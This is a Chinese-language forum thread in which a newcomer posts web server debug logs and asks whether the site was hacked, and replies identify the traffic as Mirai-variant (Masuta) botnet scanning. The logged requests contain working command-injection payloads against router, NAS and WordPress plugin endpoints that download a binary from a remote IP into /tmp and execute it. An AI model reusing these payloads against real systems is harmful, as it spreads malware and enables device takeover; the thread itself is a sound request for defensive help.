首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Node.js
Express
PPA for Ubuntu
ppa:chris-lea/node.js
拉勾
V2EX  ›  Node.js

新手求帮忙看看 web 后台 控制台输出这些 是不是被人黑了

  •  
  •   sisivol · 244 天前 · 3284 次点击
    这是一个创建于 244 天前的主题,其中的信息可能已经有所发展或是发生改变。
    网站后台空闲会输出这些 进了这些 IP 看了 里面都是像文件列表一样的

    debug: Requested :: GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
    debug: Requested :: GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20dlink%27$
    debug: Requested :: GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
    debug: Requested :: GET /maker/snwrite.cgi?mac=1234;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
    debug: Requested :: GET /wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://localhost/1.jpg$(wget$20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz)
    2 回复  |  直到 2018-07-30 10:25:55 +08:00
        1
    qinxi   244 天前   ♥ 1
    只是试图让你机器帮忙挖矿而已
        2
    ljcnaix   239 天前
    这是一个 Mirai 僵尸网络变种叫 Masuta,最近比较活跃,使用 5 个漏洞传播(都是针对 IoT 设备的),只有一个是针对 Wordpress 的,你的网站如果用了 Wordpress 自查一下这个漏洞( https://www.exploit-db.com/exploits/39250/)就好了,不是 Wordpress 的话更不用担心
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   3940 人在线   最高记录 4385   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 18ms · UTC 06:31 · PVG 14:31 · LAX 23:31 · JFK 02:31
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1